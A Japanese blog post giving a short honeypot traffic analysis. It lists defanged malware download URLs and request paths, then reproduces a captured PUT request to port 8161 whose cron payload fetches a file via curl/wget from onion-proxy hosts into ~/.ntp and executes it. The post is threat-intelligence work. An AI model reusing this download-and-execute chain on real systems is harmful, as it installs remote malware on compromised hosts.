【ハニーポット簡易分析】Honeytrap簡易分析(257-261日目:4/30-5/4)
Honeytrap簡易分析(249-257日目:4/30-5/4) となります。
※80ポートは除く
増加の大きな原因は送信元IP 198[.]108[.]67[.]48 からのポートスキャンが原因となっていました。
<新規マルウェアダウンロード>
ポート | マルウェアダウンロード先 | HTTPリクエストパス |
88 | hxxp://192[.]236[.]162[.]21/sh | GET /cgi-bin/nobody/Search.cgi |
8161 | hxxps://an7kmd2wp4xo7hpr[.]onion[.]pet/src/ldm | PUT /fileserver/go.txt HTTP/1.1 |
52869 | hxxp://185[.]52[.]2[.]192/Demon[.]mips | POST /picsdesc.xml HTTP/1.1 |
<気になったr通信>
今回はポート 8161 宛へのPUTリクエストについて調査してみました。
ポート番号とリクエストパスについて調査してみましたが、脆弱性を特定できるような明確な情報はありませんでした。今回検知した通信は以下となります。
PUT /fileserver/go.txt HTTP/1.1
Host: xxx.xxx.xxx.xxx:8161
*/4 * * * * root (
①curl -fsSLk --max-time 175 hxxps://an7kmd2wp4xo7hpr[.]onion[.]pet/src/ldm -o ~/.ntp||
②curl -fsSLk --max-time 175 hxxps://an7kmd2wp4xo7hpr[.]onion[.]ly/src/ldm -o ~/.ntp||
③curl -fsSLk --max-time 175 hxxps://an7kmd2wp4xo7hpr[.]onion[.]ws/src/ldm -o ~/.ntp||
④wget --quiet --no-check-certificate --timeout 175 hxxps://an7kmd2wp4xo7hpr[.]onion[.]pet/src/ldm -O ~/.ntp||
④wget --quiet --no-check-certificate --timeout 175 hxxps://an7kmd2wp4xo7hpr[.]onion[.]ly/src/ldm -O ~/.ntp||
⑤wget --quiet --no-check-certificate --timeout 175 hxxps://an7kmd2wp4xo7hpr[.]onion[.]ws/src/ldm -O ~/.ntp) && chmod x ~/.ntp
&&
⑥sh ~/.ntp\n##
①〜⑤では複数パターンで外部のマルウェアをダウンロードを試みています。
該当のURLへアクセスしたところ、urlへのアクセスができない状態であったため、マルウェアのダウンロード自体はできないと思われます。最近は、マルウェアのダウンロード先も最近はアクセス出来なくなるまでの時間が早くなっている印象です。